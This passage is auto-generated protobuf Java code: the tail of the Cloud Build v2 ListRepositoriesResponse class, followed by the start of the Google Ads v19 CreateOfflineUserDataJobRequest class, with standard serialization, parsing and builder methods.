(ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } } /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ @java.lang.Override public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < repositories_.size(); i++) { output.writeMessage(1, repositories_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, nextPageToken_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < repositories_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, repositories_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, nextPageToken_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloudbuild.v2.ListRepositoriesResponse)) { return super.equals(obj); } com.google.cloudbuild.v2.ListRepositoriesResponse other = (com.google.cloudbuild.v2.ListRepositoriesResponse) obj; if (!getRepositoriesList().equals(other.getRepositoriesList())) return false; if (!getNextPageToken().equals(other.getNextPageToken())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getRepositoriesCount() > 0) { hash = (37 * hash) + REPOSITORIES_FIELD_NUMBER; hash = (53 * hash) + getRepositoriesList().hashCode(); } hash = (37 * hash) + NEXT_PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getNextPageToken().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloudbuild.v2.ListRepositoriesResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.cloudbuild.v2.ListRepositoriesResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Message for response to listing Repositories. * </pre> * * Protobuf type {@code google.devtools.cloudbuild.v2.ListRepositoriesResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.devtools.cloudbuild.v2.ListRepositoriesResponse) com.google.cloudbuild.v2.ListRepositoriesResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloudbuild.v2.RepositoryManagerProto .internal_static_google_devtools_cloudbuild_v2_ListRepositoriesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloudbuild.v2.RepositoryManagerProto .internal_static_google_devtools_cloudbuild_v2_ListRepositoriesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloudbuild.v2.ListRepositoriesResponse.class, com.google.cloudbuild.v2.ListRepositoriesResponse.Builder.class); } // Construct using com.google.cloudbuild.v2.ListRepositoriesResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (repositoriesBuilder_ == null) { repositories_ = java.util.Collections.emptyList(); } else { repositories_ = null; repositoriesBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); nextPageToken_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloudbuild.v2.RepositoryManagerProto .internal_static_google_devtools_cloudbuild_v2_ListRepositoriesResponse_descriptor; } @java.lang.Override public com.google.cloudbuild.v2.ListRepositoriesResponse getDefaultInstanceForType() { return com.google.cloudbuild.v2.ListRepositoriesResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloudbuild.v2.ListRepositoriesResponse build() { com.google.cloudbuild.v2.ListRepositoriesResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloudbuild.v2.ListRepositoriesResponse buildPartial() { com.google.cloudbuild.v2.ListRepositoriesResponse result = new com.google.cloudbuild.v2.ListRepositoriesResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloudbuild.v2.ListRepositoriesResponse result) { if (repositoriesBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { repositories_ = java.util.Collections.unmodifiableList(repositories_); bitField0_ = (bitField0_ & ~0x00000001); } result.repositories_ = repositories_; } else { result.repositories_ = repositoriesBuilder_.build(); } } private void buildPartial0(com.google.cloudbuild.v2.ListRepositoriesResponse result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000002) != 0)) { result.nextPageToken_ = nextPageToken_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloudbuild.v2.ListRepositoriesResponse) { return mergeFrom((com.google.cloudbuild.v2.ListRepositoriesResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloudbuild.v2.ListRepositoriesResponse other) { if (other == com.google.cloudbuild.v2.ListRepositoriesResponse.getDefaultInstance()) return this; if (repositoriesBuilder_ == null) { if (!other.repositories_.isEmpty()) { if (repositories_.isEmpty()) { repositories_ = other.repositories_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureRepositoriesIsMutable(); repositories_.addAll(other.repositories_); } onChanged(); } } else { if (!other.repositories_.isEmpty()) { if (repositoriesBuilder_.isEmpty()) { repositoriesBuilder_.dispose(); repositoriesBuilder_ = null; repositories_ = other.repositories_; bitField0_ = (bitField0_ & ~0x00000001); repositoriesBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getRepositoriesFieldBuilder() : null; } else { repositoriesBuilder_.addAllMessages(other.repositories_); } } } if (!other.getNextPageToken().isEmpty()) { nextPageToken_ = other.nextPageToken_; bitField0_ |= 0x00000002; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.cloudbuild.v2.Repository m = input.readMessage( com.google.cloudbuild.v2.Repository.parser(), extensionRegistry); if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); repositories_.add(m); } else { repositoriesBuilder_.addMessage(m); } break; } // case 10 case 18: { nextPageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloudbuild.v2.Repository> repositories_ = java.util.Collections.emptyList(); private void ensureRepositoriesIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { repositories_ = new java.util.ArrayList<com.google.cloudbuild.v2.Repository>(repositories_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloudbuild.v2.Repository, com.google.cloudbuild.v2.Repository.Builder, com.google.cloudbuild.v2.RepositoryOrBuilder> repositoriesBuilder_; /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public java.util.List<com.google.cloudbuild.v2.Repository> getRepositoriesList() { if (repositoriesBuilder_ == null) { return java.util.Collections.unmodifiableList(repositories_); } else { return repositoriesBuilder_.getMessageList(); } } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public int getRepositoriesCount() { if (repositoriesBuilder_ == null) { return repositories_.size(); } else { return repositoriesBuilder_.getCount(); } } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public com.google.cloudbuild.v2.Repository getRepositories(int index) { if (repositoriesBuilder_ == null) { return repositories_.get(index); } else { return repositoriesBuilder_.getMessage(index); } } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder setRepositories(int index, com.google.cloudbuild.v2.Repository value) { if (repositoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureRepositoriesIsMutable(); repositories_.set(index, value); onChanged(); } else { repositoriesBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder setRepositories( int index, com.google.cloudbuild.v2.Repository.Builder builderForValue) { if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); repositories_.set(index, builderForValue.build()); onChanged(); } else { repositoriesBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder addRepositories(com.google.cloudbuild.v2.Repository value) { if (repositoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureRepositoriesIsMutable(); repositories_.add(value); onChanged(); } else { repositoriesBuilder_.addMessage(value); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder addRepositories(int index, com.google.cloudbuild.v2.Repository value) { if (repositoriesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureRepositoriesIsMutable(); repositories_.add(index, value); onChanged(); } else { repositoriesBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder addRepositories(com.google.cloudbuild.v2.Repository.Builder builderForValue) { if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); repositories_.add(builderForValue.build()); onChanged(); } else { repositoriesBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder addRepositories( int index, com.google.cloudbuild.v2.Repository.Builder builderForValue) { if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); repositories_.add(index, builderForValue.build()); onChanged(); } else { repositoriesBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder addAllRepositories( java.lang.Iterable<? extends com.google.cloudbuild.v2.Repository> values) { if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, repositories_); onChanged(); } else { repositoriesBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder clearRepositories() { if (repositoriesBuilder_ == null) { repositories_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { repositoriesBuilder_.clear(); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public Builder removeRepositories(int index) { if (repositoriesBuilder_ == null) { ensureRepositoriesIsMutable(); repositories_.remove(index); onChanged(); } else { repositoriesBuilder_.remove(index); } return this; } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public com.google.cloudbuild.v2.Repository.Builder getRepositoriesBuilder(int index) { return getRepositoriesFieldBuilder().getBuilder(index); } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public com.google.cloudbuild.v2.RepositoryOrBuilder getRepositoriesOrBuilder(int index) { if (repositoriesBuilder_ == null) { return repositories_.get(index); } else { return repositoriesBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public java.util.List<? extends com.google.cloudbuild.v2.RepositoryOrBuilder> getRepositoriesOrBuilderList() { if (repositoriesBuilder_ != null) { return repositoriesBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(repositories_); } } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public com.google.cloudbuild.v2.Repository.Builder addRepositoriesBuilder() { return getRepositoriesFieldBuilder() .addBuilder(com.google.cloudbuild.v2.Repository.getDefaultInstance()); } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public com.google.cloudbuild.v2.Repository.Builder addRepositoriesBuilder(int index) { return getRepositoriesFieldBuilder() .addBuilder(index, com.google.cloudbuild.v2.Repository.getDefaultInstance()); } /** * * * <pre> * The list of Repositories. * </pre> * * <code>repeated .google.devtools.cloudbuild.v2.Repository repositories = 1;</code> */ public java.util.List<com.google.cloudbuild.v2.Repository.Builder> getRepositoriesBuilderList() { return getRepositoriesFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloudbuild.v2.Repository, com.google.cloudbuild.v2.Repository.Builder, com.google.cloudbuild.v2.RepositoryOrBuilder> getRepositoriesFieldBuilder() { if (repositoriesBuilder_ == null) { repositoriesBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloudbuild.v2.Repository, com.google.cloudbuild.v2.Repository.Builder, com.google.cloudbuild.v2.RepositoryOrBuilder>( repositories_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); repositories_ = null; } return repositoriesBuilder_; } private java.lang.Object nextPageToken_ = ""; /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @return This builder for chaining. */ public Builder clearNextPageToken() { nextPageToken_ = getDefaultInstance().getNextPageToken(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * A token identifying a page of results the server should return. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The bytes for nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.devtools.cloudbuild.v2.ListRepositoriesResponse) } // @@protoc_insertion_point(class_scope:google.devtools.cloudbuild.v2.ListRepositoriesResponse) private static final com.google.cloudbuild.v2.ListRepositoriesResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloudbuild.v2.ListRepositoriesResponse(); } public static com.google.cloudbuild.v2.ListRepositoriesResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<ListRepositoriesResponse> PARSER = new com.google.protobuf.AbstractParser<ListRepositoriesResponse>() { @java.lang.Override public ListRepositoriesResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListRepositoriesResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListRepositoriesResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloudbuild.v2.ListRepositoriesResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,977
google-ads-stubs-v19/src/main/java/com/google/ads/googleads/v19/services/CreateOfflineUserDataJobRequest.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v19/services/offline_user_data_job_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v19.services; /** * <pre> * Request message for * [OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v19.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest} */ public final class CreateOfflineUserDataJobRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) CreateOfflineUserDataJobRequestOrBuilder { private static final long serialVersionUID = 0L; // Use CreateOfflineUserDataJobRequest.newBuilder() to construct. private CreateOfflineUserDataJobRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CreateOfflineUserDataJobRequest() { customerId_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CreateOfflineUserDataJobRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v19_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v19_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest.Builder.class); } private int bitField0_; public static final int CUSTOMER_ID_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. */ @java.lang.Override public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ @java.lang.Override public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int JOB_FIELD_NUMBER = 2; private com.google.ads.googleads.v19.resources.OfflineUserDataJob job_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ @java.lang.Override public boolean hasJob() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. */ @java.lang.Override public com.google.ads.googleads.v19.resources.OfflineUserDataJob getJob() { return job_ == null ? com.google.ads.googleads.v19.resources.OfflineUserDataJob.getDefaultInstance() : job_; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { return job_ == null ? com.google.ads.googleads.v19.resources.OfflineUserDataJob.getDefaultInstance() : job_; } public static final int VALIDATE_ONLY_FIELD_NUMBER = 3; private boolean validateOnly_ = false; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } public static final int ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER = 5; private boolean enableMatchRateRangePreview_ = false; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. */ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getJob()); } if (validateOnly_ != false) { output.writeBool(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { output.writeBool(5, enableMatchRateRangePreview_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getJob()); } if (validateOnly_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(5, enableMatchRateRangePreview_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest)) { return super.equals(obj); } com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest other = (com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) obj; if (!getCustomerId() .equals(other.getCustomerId())) return false; if (hasJob() != other.hasJob()) return false; if (hasJob()) { if (!getJob() .equals(other.getJob())) return false; } if (getValidateOnly() != other.getValidateOnly()) return false; if (getEnableMatchRateRangePreview() != other.getEnableMatchRateRangePreview()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + CUSTOMER_ID_FIELD_NUMBER; hash = (53 * hash) + getCustomerId().hashCode(); if (hasJob()) { hash = (37 * hash) + JOB_FIELD_NUMBER; hash = (53 * hash) + getJob().hashCode(); } hash = (37 * hash) + VALIDATE_ONLY_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getValidateOnly()); hash = (37 * hash) + ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getEnableMatchRateRangePreview()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static 